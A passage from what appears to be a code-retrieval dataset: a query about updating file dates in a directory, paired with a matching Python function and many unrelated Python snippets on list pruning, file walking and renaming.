path.is_file():\n path.unlink()\n elif path.is_dir():\n try:\n path.rmdir()\n except OSError:\n # prevents deleting non-empty folders\n pass\n\n # second pass to delete empty folders\n # after deleting files, some folders might have been left empty\n for p in self.basedir.rglob(\"*\"):\n if p.is_dir() and p not in exclude and not any(p.glob(\"*\")):\n p.rmdir()", "def delete_lists():\n del SAVE_EXISTENT[:]\n del SAVE_PRICE[:]\n del CARDS[:]", "def without(self, *args):\n return self.reject(lambda x: x in args)", "def remove(self, *args):\n return _libsbml.ListOfSpeciesReferences_remove(self, *args)", "def remove_elements_from_set(s: set, *args) -> set:\n for _ in args:\n s.remove(_)\n return s", "def prune(self): # HashMap.prune\n for hashval, list in self.contentHash.iteritems():\n newlist=[]\n for entry in list:\n if not entry.deleted:\n newlist.append(entry)\n self.contentHash[hashval]=newlist", "def remove_duplicate_notes(self):\n res = []\n for x in self.notes:\n if x not in res:\n res.append(x)\n self.notes = res\n return res", "def clear_invalid_node_references(doc, ids_to_remove):\n start = time.time()\n for elem in doc.iter(\"nd\"):\n ref = elem.attrib[\"ref\"]\n\n if ref in ids_to_remove:\n tmp = elem\n elem = elem.getnext()\n tmp.getparent().remove(tmp)\n\n print 'Time Taken :: ', round(time.time() - start, 3), \" seconds\"\n return doc", "def _RemoveFromCloneList(self, clone, attrNamesToClone):\n attrNamesToClone = super(EquationUnit, self)._RemoveFromCloneList(clone, attrNamesToClone)\n \n dontClone = [\"_Funcs\", \"_FuncsDefs\"]\n \n for name in dontClone:\n if name in attrNamesToClone:\n attrNamesToClone.remove(name)\n \n return attrNamesToClone", "def cleanup():\n for s in [missiles, explosions, bonus]:\n\n set_to_remove = set([])\n for m in s:\n if m.isDead:\n set_to_remove.add(m)\n\n s.difference_update(set_to_remove)", "def twogremove(tr_twoglijst, tr_twogs):\n for b in tr_twoglijst:\n tr_twogs.remove(b)", "def remove(self, identifier: int):\n self.items = list(filter(lambda x: x.identifier != identifier, self.items))", "def trim_items(self, items):\r\n\t\tlogger.debug(\"Enter\")\r\n\t\t\r\n\t\tif self.transactions:\r\n\t\t\tall_items = set.union(*[self.transactions[u][-1] for u in self.transactions.keys()])\r\n\t\telse:\r\n\t\t\treturn items\r\n\t\t\t\r\n\t\ttmp = items.copy()\r\n\t\t\r\n\t\tfor i in items:\r\n\t\t\tif i in all_items:\r\n\t\t\t\tlogger.debug(\"Removing %r\" % i)\r\n\t\t\t\ttmp.remove(i)\r\n\t\t\t\t\r\n\t\tlogger.debug(\"Exit\")\r\n\t\treturn tmp", "def _remove_ignored_empty_subelems(subelems1, subelems2, parent_path, ignore_namespaces, ignored_empty_tags, debug_stream):\r\n ds = debug_stream\r\n if ds: print >>ds, \"parent_path: %s\" % parent_path\r\n removed = []\r\n for i, subelem1 in enumerate(subelems1):\r\n if len(subelem1.getchildren()) > 0:\r\n continue\r\n \r\n # See if the tag should be ignored if it doesn't exist on\r\n # the other side\r\n is_ignored = False\r\n for ignored_tag in ignored_empty_tags:\r\n if ds: print >>ds, \"ignored_tag = %s, tag = %s\" % (ignored_tag, parent_path + \"/\" + _get_tag(subelem1, ignore_namespaces))\r\n if ignored_tag == parent_path + \"/\" + _get_tag(subelem1, ignore_namespaces):\r\n is_ignored = True\r\n break\r\n if not is_ignored:\r\n continue\r\n \r\n # See if the tag exists on the other side\r\n found = False\r\n for subelem2 in subelems2:\r\n if _get_tag(subelem1, ignore_namespaces) == _get_tag(subelem2, ignore_namespaces):\r\n found = True\r\n break\r\n if not found:\r\n removed.append(i)\r\n \r\n # Sort and reverse the removed list so that deleting starts from the\r\n # end and the indices are correct throughout the operation\r\n removed.sort()\r\n removed = removed[::-1]\r\n if len(removed) >= 2:\r\n if removed[0] < removed[-1]:\r\n raise RuntimeError(\"Internal error: list in wrong order: %s\" % removed)\r\n \r\n for i in removed:\r\n del subelems1[i]", "def list_subtract(a, b):\n a_only = list(a)\n for x in b:\n if x in a_only:\n a_only.remove(x)\n return a_only", "def _unprune_referenced_sub_workflows(self, keep_paths, prune_paths):\n\n keep_nodes = frozenset([path[-1] for path in keep_paths])\n\n shift_path_indexes = frozenset(\n idx for (idx, path) in enumerate(prune_paths)\n if any(node in keep_nodes for node in path))\n\n if not shift_path_indexes:\n return (keep_paths, prune_paths)\n\n for idx in shift_path_indexes:\n node = prune_paths[idx][-1]\n logger.info(\n \"Keeping node %s.%s because it is downstream of an --only-nodes argument\",\n node[0],\n node[1])\n\n return self._unprune_referenced_sub_workflows(\n keep_paths + [prune_paths[i] for i in shift_path_indexes],\n [path for (i, path) in enumerate(prune_paths) if i not in shift_path_indexes])", "def prune_taxa(self, taxa, update_taxon_set=False):\n for taxon in taxa:\n if taxon in self.taxon_seq_map:\n del self.taxon_seq_map[taxon]\n if update_taxon_set and taxon in self.taxon_set:\n self.taxon_set.remove(taxon)", "def removeFromPlayerList(self):\n\t\tfor x in self.playerRemoveList:\n\t\t\tself.removePlayer(x)", "def removebannedtracks(bannedtracks, similartracks, logger): # {{{1\n nbannedtracks = 0\n index = 0\n while index < len(similartracks):\n weight, track = similartracks[index]\n if track.get('artist', '') != '' and track.get('title', '') != '' and \\\n createkey(track['artist'], track['title']) in bannedtracks:\n del similartracks[index]\n nbannedtracks += 1\n else:\n index += 1\n if nbannedtracks > 0:\n logger.debug('Ignored %i banned track(s) from Last.fm', nbannedtracks)", "def discard(self, value):\n if value not in self._innercontainer:\n warnings.warn(\"Element %s to discard is not in the collection, skip.\" % (value.__str__()),\n category=InexistentElementWarning,\n stacklevel=3)\n else:\n self._innercontainer.remove(value)\n return self", "def remExternalDependency(self, mods):\n for mod in mods:\n try:\n self.reqmodules_external.remove(mod)\n except:\n print \"\\n*** WARNING: \" + mod + \" not found in the list of external dependencies from \" + self.name + \"!!\"\n print \"please recheck your config file: names are case-sensitive!!\"", "def _filter_denies(self, filtered_ref):\n for deny in self.denies_:\n if not deny:\n continue\n\n for ref_key in filtered_ref.ref_keys(deny):\n del filtered_ref[ref_key]", "def removeAdopted(credInstances, orphanedInstances):\n # Make sure we have a copy of the keys not just an iterator\n # since we'll be deleting\n for k in list(credInstances.keys()):\n if k not in orphanedInstances:\n credInstances.pop(k)", "def retainAll(self, c):\n for x in self.knownStrings:\n if x not in c:\n self.knownStrings.remove(x)", "def remove(self):\n self.inp.inputs.discard(self)\n self.out.outputs.discard(self)", "def prune(self, arguments):\n puts_err(colored.red(\"Not implemented!\"))", "def prune(self, rel=None):\n deleted = self._registry._get_not_reachable(self.root, rel=rel)\n for d in deleted:\n self._delete_cuds_triples(d)", "def drop_reference_points(self):\n self._cpp_obj.drop_reference_points()\n return self", "def excludes(self) -> Set:\n if self._excludes is None:\n manifest = self._get_manifest()\n self._excludes = manifest[\"files\"][\"excludes\"]\n\n return self._excludes", "def exclude_nodes(self, nodes):", "def removeDuplicates(self,covariateList,bands):\n\t\t\n\t\treturn [elem for elem in covariateList if elem not in bands]", "def list_remove(alist, items):\n for item in get_iter(items):\n while item in alist:\n alist.remove(item)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def _prune_heads(self, heads_to_prune):\n for layer, heads in heads_to_prune.items():\n self.encoder.layer[layer].attention.prune_heads(heads)", "def filter_backups_to_keep(self, backups: List[Backup]) -> (List[Backup]):\n pass", "def remove_tags(self, tags):\n\n tags = H.to_list(tags)\n # self._tags.difference_update(tags)\n self.tags.difference_update(tags)", "def remove_identical(list):\n seen = set()\n seen_add = seen.add\n return [x for x in list if not (x in seen or seen_add(x))]", "def ignore_unmanaged_references(unmanaged_virtuals, unmanaged_pools,\n delete_policies, delete_irules,\n delete_pools, delete_monitors,\n delete_data_groups):\n\n ignore_policies = set()\n ignore_irules = set()\n ignore_pools = set()\n ignore_monitors = set()\n ignore_data_groups = set()\n\n # Start off getting a list of referenced resources\n for virtual in unmanaged_virtuals:\n for rule in virtual.data['rules']:\n ignore_irules.add(rule)\n for policy in virtual.data['policies']:\n ignore_policies.add(\"/{}/{}\".format(policy['partition'],\n policy['name']))\n\n for policy in delete_policies:\n if policy.full_path() in ignore_policies:\n for rule in policy.data['rules']:\n if 'actions' in rule:\n for action in rule['actions']:\n if 'pool' in action:\n # pool name contains partition already\n ignore_pools.add(action['pool'])\n\n # For irules we examine the irule content for a reference to\n # any of the data groups we want to delete (not ideal). If we\n # find a mention of the data group, we don't delete it.\n for irule in delete_irules:\n if irule.full_path() in ignore_irules:\n for data_group in delete_data_groups:\n if data_group.name in irule.data['apiAnonymous']:\n ignore_data_groups.add(data_group.full_path())\n\n # For the pools we are not going to delete (either unmanaged, or\n # referenced by an unmanaged virtual server), we must not delete\n # the referenced health monitor.\n for pool in unmanaged_pools:\n ignore_monitors.update(pool.monitors())\n for pool in delete_pools:\n if pool.full_path() in ignore_pools:\n ignore_monitors.update(pool.monitors())\n\n # Remove from the delete list any resource still used by the\n # whitelisted virtuals\n def _prune_resources(resource_name, resource_list, ignore_resources):\n found = True\n while found:\n found = False\n for idx, resource in enumerate(resource_list):\n if resource.full_path() in ignore_resources:\n LOGGER.debug(\"Pruning %s resource %s from delete list\",\n resource_name, resource.full_path())\n del resource_list[idx]\n found = True\n break\n\n _prune_resources(\"policy\", delete_policies, ignore_policies)\n _prune_resources(\"irule\", delete_irules, ignore_irules)\n _prune_resources(\"pool\", delete_pools, ignore_pools)\n _prune_resources(\"monitor\", delete_monitors, ignore_monitors)\n _prune_resources(\"data_group\", delete_data_groups, ignore_data_groups)", "def remove_unused_influence(skin_node):\n influence_list = skin_node.getInfluence()\n weight_inf_list = skin_node.getWeightedInfluence()\n # Set skinCluster to HasNoEffect so it won't process after each removal\n skin_node.nodeState.set(1)\n zero_weight_inf_list = list(set(influence_list) - set(weight_inf_list))\n skin_node.removeInfluence(zero_weight_inf_list)\n skin_node.nodeState.set(0)\n return zero_weight_inf_list", "def mRemove(self, **kw):\n kw = copy_non_reserved_keywords(kw)\n for key, val in kw.items():\n # It would be easier on the eyes to write this using\n # \"continue\" statements whenever we finish processing an item,\n # but Python 1.5.2 apparently doesn't let you use \"continue\"\n # within try:-except: blocks, so we have to nest our code.\n try:\n orig = self._dict[key]\n except KeyError:\n # No existing variable in the environment, so just skip it\n pass\n else:\n try:\n # Most straightforward: just try to substract it.\n # But this will not work in most cases :-(\n self._dict[key] = orig - val\n except TypeError:\n try:\n # It orig and val is dictionaties:\n for k in val.keys():\n del orig[k]\n # May be some recursion ?\n except AttributeError:\n try:\n # Check if the original is a list.\n remove_from_orig = orig.remove\n except AttributeError:\n # Can't do nothing more\n pass\n else:\n # The original is a list, so remove\n # value from it.\n try:\n i = val[0]\n except TypeError:\n val = [ val ]\n for i in val:\n try:\n remove_from_orig(i)\n except ValueError:\n pass\n self.scanner_map_delete(kw)" ]
[ "0.6355515", "0.63518995", "0.62366766", "0.6146372", "0.609999", "0.60373515", "0.59647715", "0.58614707", "0.58380705", "0.581101", "0.57721406", "0.5733889", "0.56982344", "0.5688912", "0.56855273", "0.5677034", "0.5676934", "0.5671325", "0.5661625", "0.56558764", "0.5645472", "0.563794", "0.55878043", "0.55845237", "0.5576259", "0.5575393", "0.55559015", "0.5551329", "0.55386376", "0.551091", "0.5498882", "0.5498519", "0.54809004", "0.54794014", "0.54777473", "0.5435313", "0.5433683", "0.54273856", "0.54133874", "0.54080844", "0.54065543", "0.54065543", "0.54026496", "0.5400365", "0.53931093", "0.5389099", "0.5389074", "0.53845024", "0.53827506", "0.5379948", "0.53686076", "0.5363458", "0.53553003", "0.5349619", "0.5342054", "0.5338471", "0.53352743", "0.5334963", "0.5332074", "0.53275275", "0.53217214", "0.5321436", "0.5316534", "0.5314192", "0.5313343", "0.53044325", "0.5303761", "0.52967364", "0.52931815", "0.52929044", "0.5288462", "0.52861387", "0.5285163", "0.5284783", "0.5284395", "0.5276463", "0.52737325", "0.5273154", "0.5269539", "0.52626765", "0.52626497", "0.5262173", "0.52606004", "0.5254817", "0.52541983", "0.525318", "0.5252919", "0.5250377", "0.5246868", "0.52439386", "0.5238101", "0.52365446", "0.52349305", "0.52349305", "0.52349305", "0.523083", "0.52292407", "0.52282345", "0.5223091", "0.5214466", "0.52109313" ]
0.0
-1
This function loops through directory and updates dates of files in said directory.
def update_date(dest=dest): for root, _, files in os.walk(dest): ignore = ["README.md","SUMMARY.md"] _ = [edit_files(root + "/" + file) for file in files if (file not in ignore and file.endswith(".md"))]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _update_files():\n configuration_settings = get_configuration()\n\n # Need to find all of the files that are stored in the input_files directories in order to start building the\n # reports that will be used to generate the static log files.\n for input_path in configuration_settings.processing.inputs:\n search_path = pathlib.Path(input_path)\n\n # Currently going to make the assumption that everyone is using the path naming convention that I'm dictating\n # which is YYYY/MM/DD/file.ext\n for file_component in search_path.glob('*/*/*/*'):\n # Store all of the files into a dictionary containing the keys and a list of the files that are associated\n # with that day\n updaters.update_files(search_path, file_component)", "def upload_all_workout_from_directory(directory_path):\n day = datetime.date.today() - datetime.timedelta(days=datetime.date.today().weekday(), weeks=1)\n for root, dirs, files in os.walk(directory_path):\n for f in files:\n print(f)\n upload_workout_from_directory(os.path.relpath(os.path.join(root, f), \".\"), get_next_monday(day))\n day = get_next_monday(day)", "def run(self):\n super().run()\n date_subdirs = sorted(self.list_directory(self.input_location,\n self.input_location_type))\n for date_subdir in date_subdirs:\n if not re.search(\"^([\\d]{4}-[\\d]{2}-[\\d]{2})\", date_subdir):\n print(\"{}: Directory name {} not in YYYY-MM-DD format\"\\\n .format(self.name, date_subdir))\n continue\n date_path = os.path.join(self.input_location, date_subdir, \"RAW\")\n if len(self.list_directory(date_path, self.input_location_type)) == 0:\n continue\n processed_ok = self.process_single_date(date_path)\n if not processed_ok:\n continue", "def iterate_dir(dir_path:str, files, equipt_nr):\n for ii in os.listdir(dir_path):\n if os.path.isdir(ii):\n iterate_dir(ii)\n elif re.search('[0-9]{7}', ii):\n rename_file(ii, equipt_nr)\n else:\n print('not editing : ' + ii)", "def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []", "def getFilesToProcess(directoryPath, nextDateToProcess) :\n fileNames = []\n for (dirpath, dirnames, filenames) in os.walk(directoryPath) :\n fileNames.extend(filenames)\n break\n\n nextDate = datetime.datetime.strptime(nextDateToProcess, \"%Y-%m-%d\")\n filesToProcess = []\n for fileName in fileNames :\n tokens = fileName.split('_')\n lastToken = tokens[len(tokens) - 1]\n tokens = lastToken.split('.')\n dateTimeString = tokens[0]\n dateTimeObj = datetime.datetime.strptime(dateTimeString, \"%Y-%m-%d-%H-%M\")\n if dateTimeObj.date() == nextDate.date() :\n filesToProcess.append(fileName)\n\n return filesToProcess", "def main():\r\n parent_dir = 'D:\\\\Profession\\\\Intern\\\\Assignments\\\\Codes\\\\Assignement Codes\\\\Part 2\\\\data_dumps'\r\n\r\n if not (os.path.isdir(parent_dir)):\r\n raise Exception(\"The directory doesn't exist\")\r\n\r\n directories = []\r\n\r\n for directory in os.listdir(parent_dir):\r\n directories.append(os.path.join(parent_dir, directory))\r\n\r\n # The group_dic represents the dictionary with keys equal to the unique dates in the directories\r\n # And the values represent a list of all files that have the same date prefix across the data_dumps\r\n group_dic = grouping(directories)\r\n\r\n # Moving Files into New Directory\r\n move(group_dic, parent_dir)\r\n print(\"Files Moved Successfully\")", "def count_files_loop(self, dirpath):\n for i in os.listdir(dirpath):\n if i[0] == '.':\n continue\n elif os.path.isdir(dirpath + i):\n self.count_files_loop(dirpath + i + '/')\n elif os.path.isfile(dirpath + i):\n self.file_count += 1\n else:\n print dirpath + i, 'does not exist'\n return", "def update_source_files(source_directory_list, source_extension_list):\n # get source files in the directory list\n source_total = 0\n for unused, source_directory in enumerate(source_directory_list):\n source_files_list = []\n get_requested_files(source_directory, source_extension_list, source_files_list)\n # update the files with shared object references\n for unused, source_file in enumerate(source_files_list):\n updated_file = []\n file_changed = modify_input_file(source_file, updated_file)\n if file_changed:\n filepath = get_printble_filepath(source_file)\n print(filepath)\n source_total += 1\n if __file_update:\n write_output_file(updated_file, source_file)\n print(\"Total Files\", source_total)\n print()", "def parse_dir(self, directory):\n for dir in os.listdir(directory):\n if dir in ['.git', '.github', '.vscode', 'docs']:\n continue\n next_dir = os.path.join(directory, dir)\n if os.path.isdir(next_dir):\n if dir.startswith('template_'):\n self.parse_template(next_dir)\n else:\n normpath = os.path.relpath(next_dir)\n normpath = os.path.normpath(normpath)\n path = normpath.split(os.sep)\n self.add_folder(path)\n # add_directory(next_dir)\n self.parse_dir(next_dir)", "def process_dir(self, src_dir, dst_dir):\n self.logger.tree(src_dir)\n for srcpath in self.list_all_files(src_dir):\n dstpath = srcpath.replace(src_dir, dst_dir)\n # TODO: Can we clean up the way we handle relative_path?\n # Relative path is here so that when we print files in the log it\n # shows only the file's path. Should we just pass it to the logger\n # when we create it? Or let the logger figure it out?\n # relative_path = srcpath.replace(src_dir + '/', '')\n self.cur_file = File(srcpath, dstpath, self.logger)\n self.process_file(self.cur_file)", "def dolibupdate(root, subdir):\n\n global fileCount, grooveCount, gdDate, grooveDB, processedFiles, mkGrooveList\n\n db = grooveDB[0][1]\n\n if subdir == '.':\n print \"Skipping: '.'\"\n return\n\n if subdir:\n print \" Processing library directory '%s'.\" % subdir\n\n\n \"\"\" Get a list of the files in this directory. If the list\n includes a file called 'MMAIGNORE' the entire directory\n (and subdirs) is ignored. Otherwise, each file in the\n directory ending in 'mma' is parsed for groove defs.\n \"\"\"\n\n p = os.path.join(root,subdir)\n dirfiles = os.listdir(p)\n\n if \"MMAIGNORE\" in dirfiles:\n print \"Skipping: %s\" % p\n return\n\n for fn in sorted(dirfiles):\n\n # Ignore hidden files and emacs auto-save and dead.\n\n if fn.startswith('.') or fn.startswith('#'):\n continue\n\n f=os.path.join(root, subdir, fn) # Create full path name\n\n if os.path.isdir(f):\n dolibupdate(root, os.path.join(subdir,fn)) # recursive!\n\n elif f.endswith(gbl.ext):\n ename = os.path.join(subdir, fn)\n\n processedFiles.append(ename)\n \n if gdDate and ename in db and os.path.getmtime(f) < gdDate:\n print \" Existing: %s\" % f\n grooveCount += len(db[ename])\n continue\n\n if ename in db:\n print \" Updating: %s\" % f\n else:\n print \" Creating: %s\" % f\n mkGrooveList = []\n MMA.grooves.grooveClear([])\n gbl.mtrks = {}\n MMA.swing.mode = 0\n for c in gbl.midiAssigns.keys():\n gbl.midiAssigns[c]=[]\n for a,v in enumerate(gbl.midiAvail):\n gbl.midiAvail[a]=0\n gbl.mtrks[0]=MMA.midi.Mtrk(0)\n\n gbl.tnames = {}\n\n MMA.parse.parseFile(f) # read current file, grab grooves\n\n fileCount += 1 # just so we can report to user\n grooveCount += len(mkGrooveList)\n db[ename]=mkGrooveList\n\n else:\n if not f.endswith(mmadir):\n print \" Ignoring: %s\" % f", "def add_timestamps(dir_video):\n print(\"Adding creation dates to file names\")\n os.chdir(dir_video)\n # get only top level dir info\n dir_data_video_files = next(os.walk(dir_video))\n list_video_files = dir_data_video_files[2] # get file list\n for f_name in list_video_files:\n if GOPRO_PATTERN.search(f_name):\n f_time = time.strftime(r\"%Y-%m-%d_%H-%M\", time.localtime(os.path.getctime(f_name)))\n os.rename(f_name, f\"{f_time}_{f_name}\")", "def updateIndex(self):\n for root, dirs, files in os.walk(self.serverdir):\n for d in dirs:\n if not d.startswith('.'):\n relpath = os.path.relpath(os.path.join(root, d), self.serverdir)\n self.serverindex[relpath] = (self.getNametype(os.path.join(root,d)), os.path.getmtime(os.path.join(root, d)))\n for f in files:\n if not f.startswith('.'):\n relpath = os.path.relpath(os.path.join(root, f), self.serverdir)\n self.serverindex[relpath] = (self.getNametype(os.path.join(root,f)), os.path.getmtime(os.path.join(root, f)))", "def updateCache(self):\n for root, dirs, files in os.walk(cachedFilesPath):\n for file in files:\n if file.endswith(cachedFileExtensionSuffix):\n path = os.getcwd()+'/'+cachedFilesPath+file\n with open(path, mode='r') as f:\n payload_json = f.read()\n payload_obj=jsonpickle.decode(payload_json)\n r= self.upload(payload_obj)\n if isinstance(r, types.NoneType):\n #do nothing\n print(\"\")\n else:\n if r.status_code == 200 :\n #uploaded!\n if cacheArhive:\n #move it to archive\n dst=os.getcwd()+'/'+cachedArchivePath+file\n shutil.move(path, dst)\n print(\"archived log: \", file)\n else:\n #delete it\n os.remove(path)", "def do_merge_all():\n for rawd, merged in TOMERGE:\n mylogger.info(\"cleaning \" + merged)\n ensure_dir(merged)\n cleandir(merged)\n mylogger.info(\"merging \" + rawd + \" to \" + merged)\n build_merged_dir(build_sensor_file_map(rawd), merged)\n\n # add timestamp file\n\tf = open(TIMESTAMP_FILE,\"w\")\n\tf.write(str(datetime.datetime.now()))\n\tf.close()", "def scan_dir(self, dir):\n import pathlib\n import magic\n\n for filename in find_all_files(dir):\n self.filelist.append({\n \"filename\": filename,\n \"mime\": magic.from_file(filename, mime=True),\n \"size_bytes\": os.path.getsize(filename),\n \"ext\": pathlib.Path(filename).suffix\n })", "def update_reports():\n return os.listdir('./reports')", "def _update_subfiles(self) -> None:\n\t\t# Clear list of subfiles\n\t\tself.subfiles.clear()\n\t\t# Iterate over Nodes\n\t\tfor node in self.nodes:\n\t\t\tfor file in node.get_subfiles():\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))\n\t\t# Iterate over SubNodes\n\t\tfor subnode in self.subnodes:\n\t\t\tfor file in subnode.filenames:\n\t\t\t\tself.subfiles.add(\"{}/{}\".format(self.xml_dir, file))", "def calibrate_directory(self, directory, custom_file, out_dir, overwrite_rad, overwrite_ref):\n self.total_files = sum([len(files) for r, d, files in os.walk(directory)])\n self.current_file = 1\n try:\n for file_name in os.listdir(directory):\n # check each file in directory (file or subdirectory?)\n full_path = os.path.join(directory, file_name)\n if os.path.isdir(full_path) and full_path is not out_dir:\n # recursive call for each subdirectory\n self.calibrate_directory(os.path.join(directory, file_name), custom_file, out_dir,\n overwrite_rad, overwrite_ref)\n else:\n # calibrate each file individually\n self.calibrate_file(full_path, custom_file, out_dir, overwrite_rad, overwrite_ref)\n self.current_file += 1\n self.update_progress()\n except FileNotFoundError:\n print(directory + \": directory does not exist.\")\n with open(self.logfile, 'a+') as log:\n log.write(directory + ': relative reflectance input - directory does not exist \\n')\n if self.main_app is not None:\n raise InputFileNotFoundException(directory)\n self.update_progress(100)", "def save(self,\n directory,\n dir_pattern=None,\n file_pattern=\"{accession_number}\",\n download_all=False,\n daily_date_format=\"%Y%m%d\"):\n for (year, quarter, f) in self.quarterly_date_list:\n self.quarterly.year = year\n self.quarterly.quarter = quarter\n self.quarterly.entry_filter = lambda x: f(x) and self.entry_filter(x)\n self.quarterly.save(directory=directory,\n dir_pattern=dir_pattern,\n file_pattern=file_pattern,\n download_all=download_all)\n\n for d in self.daily_date_list:\n self.daily.date = d\n try:\n self.daily.save(directory=directory,\n dir_pattern=dir_pattern,\n file_pattern=file_pattern,\n download_all=download_all,\n date_format=daily_date_format)\n except (EDGARQueryError, NoFilingsError):\n pass", "def recursively_rename_files():\n ordered_equipts = get_directory_definition()\n\n # Iterates each equipement folder\n for ii in ordered_equipts:\n iterate_dir(ii, ordered_equipts.index(ii))", "def update_directory(dir):\n print('Updating {dir}...'.format(dir=dir))\n os.chdir(dir)\n status = 1\n tries = 0\n # Keep trying to git pull until success, or until tries = 30\n while status != 0:\n status = os.system('sudo git pull')\n tries += 1\n if status != 0:\n print('Trying again. Attempt {0} out of 30.'.format(tries))\n if tries == 30:\n break\n if status == 0:\n print('Succeeded.')\n else:\n print('Failed after 30 tries.')", "def _walk_dir(self, rootpath):\n assert os.path.isabs(rootpath)\n assert rootpath not in self._dirs\n relpath = self._get_rel_path(rootpath)\n self._dirs[relpath] = Directory(rootpath, relpath, None)\n for dirpath, dirnames, filenames in os.walk(rootpath):\n if 'refdata' in dirnames:\n dirnames.remove('refdata')\n currentdir = self._dirs[self._get_rel_path(dirpath)]\n # Loop through a copy so that we can modify dirnames.\n for dirname in list(dirnames):\n fullpath = os.path.join(dirpath, dirname)\n if fullpath == self._build_root:\n dirnames.remove(dirname)\n continue\n relpath = self._get_rel_path(fullpath)\n self._dirs[relpath] = Directory(fullpath, relpath, currentdir)\n extensions = ('.h', '.cuh', '.hpp', '.c', '.cc', '.cpp', '.cu', '.bm')\n for filename in filenames:\n basename, extension = os.path.splitext(filename)\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = File(fullpath, relpath, currentdir)\n elif extension == '.cmakein':\n extension = os.path.splitext(basename)[1]\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n sourcefile = GeneratorSourceFile(fullpath, relpath, currentdir)\n self._files[relpath] = sourcefile\n fullpath = os.path.join(dirpath, basename)\n relpath = self._get_rel_path(fullpath)\n fullpath = os.path.join(self._build_root, relpath)\n generatedfile = GeneratedFile(fullpath, relpath, currentdir)\n self._files[relpath] = generatedfile\n generatedfile.set_generator_source(sourcefile)\n elif extension in ('.l', '.y', '.pre'):\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = GeneratorSourceFile(fullpath, relpath, currentdir)", "def preprocess_dir(self, manifest_dir, content_property, kwargs=None):\n # Start the timer\n start = time.time()\n # Walk the directory and preprocess each file\n all_files = [\n os.path.join(r, file)\n for r, d, f in os.walk(manifest_dir)\n for file in f\n if file.endswith(\".json\") and not file.startswith(\"._\")\n ]\n for file in all_files:\n file = file.replace(\"\\\\\", \"/\") # Handle Windows paths\n tmp = file.split(\"/\")\n path = \"/\".join(tmp[:-1])\n filename = tmp[-1]\n self.preprocess(path, filename, content_property, kwargs=None)\n # Print time to completion\n end = time.time()\n t = end - start\n print(\"Processed all files in \" + str(t) + \" seconds.\")", "def readDirectory():\n tagdir = \"tagreplacements\"\n data = os.listdir(tagdir)\n for d in data:\n processFile(os.path.join(tagdir,d))\n \n #print(repd)", "def find_identical_files(directory):\n # go to the directory\n os.chdir(directory)\n \n # the problem wiht the md5 in our scan is that it causes the access time to be\n # updated. This renders future scans of the directory when looking for old files\n # to see them no older than the last scan. An approach to get around this would\n # be to retrieve the access times for all the files using the stat command\n # then use touch reset the access time to the original. This may change other\n # time stats too need to look in that. Here is a command set example for\n # changing the access times using touch:\n\n # addressing access times\n \n # 1 - fetch all the previous accesstimes\n try:\n find_stat = subprocess.Popen(\"find * -exec stat '{}' \\;\",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n # get the standard output\n out, err = find_stat.communicate() # get the standard output\n fstats = out.decode().split(\"\\n\") # split the text into a list\n fdates = {}\n for s in fstats:\n # parse stat output lines appear as follows:\n #16777220 1001760 -rw-r--r-- 1 todd staff 0 7 \"Jan 25 22:07:00 2015\" \"Jan 25 22:00:07 2015\" \"Jan 25 22:09:51 2015\" \"Jan 25 22:00:07 2015\" 4096 8 0 bar.txt\n if s == \"\":\n continue\n at = re.search(\"\\\"[^\\\"]+\\\"\",s).group(0)\n at = at.strip('\"')\n dspec = file_date_to_spec(at)\n #ss = s.split(\" \")\n ss = re.split(\"\\s+\",s)\n fn = \" \".join(ss[27:])\n fdates[fn] = dspec\n \n\n # get the md5 sums for each file...the side effect is the access time changes...but we repair these \n file_by_md5 = {}\n for fn in fdates.keys():\n \n # run md5 sum and get the value in a dict\n try:\n cmd_md5 = subprocess.Popen(\"md5 \"+fn,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n except:\n raise\n out, err = cmd_md5.communicate() # get the standard output\n md5 = out.decode() # split the text into a list\n md5 = md5.rstrip()\n if md5 == '':\n continue\n p = re.split(\"\\) = \",md5)\n if len(p) < 2:\n print(\"Failed to split \"+f)\n fnn = re.sub(\"MD5 \\(\",\"\",p[0])\n if fnn != fn:\n print(\"The file returned by md5 was not was not what was expected: \"+fnn)\n print(\"Expected: \"+fn)\n if file_by_md5.__contains__(p[1]):\n file_by_md5[p[1]] += [ fn ]\n else:\n file_by_md5[p[1]] = [ fn ]\n \n # repair access time using touch command e.g.:\n # /usr/bin/touch -a -t 201501252207.30 bar.txt\n tch = \"/usr/bin/touch -a -t \"+fdates[fn]+\" \"+fn\n return_signal = subprocess.call(tch.split())\n if return_signal != 0:\n print(\"Could not run command \"+tch)\n sys.exit()\n \n # create our dict of list of files keyed by md5 sums\n identical = {}\n for md5 in file_by_md5.keys():\n if len(file_by_md5[md5]) == 1:\n continue\n identical[md5] = file_by_md5[md5]\n \n # go back to our starting directory \n os.chdir(iwd)\n \n return(identical)", "def changeDate(names, date, ctlFunc = lambda s, d: True): \n\n # parse date\n try:\n day, month, year = re.fullmatch(\"(\\d\\d)(\\d\\d)(\\d\\d\\d\\d)\", date).groups()\n except AttributeError as e:\n raise\n \n # convert strings to ints\n day = int(day)\n month = int(month)\n year = int(year)\n \n for name in names:\n\n if ctlFunc(name, \"*DATE*\"):\n\n # get HH MM SS from file\n p_timestamp = os.path.getmtime(name)\n mdt = datetime.datetime.fromtimestamp(p_timestamp)\n \n # construct new datetime object with file time and provided date\n mdt = datetime.datetime(year, month, day, mdt.hour, mdt.minute, mdt.second)\n\n # change to new file timestamp by passing in datetime.timestamp() \n os.utime(name, (mdt.timestamp(), mdt.timestamp()))", "def count_files_md5hash_indir(self, dir_path):\n for file_name in os.listdir(dir_path):\n file_path = \"{}/{}\".format(dir_path, file_name)\n self.md5hash.add(count_md5hash_file(file_path))", "def updateBaseFiles(self):\n for filename, filetype in 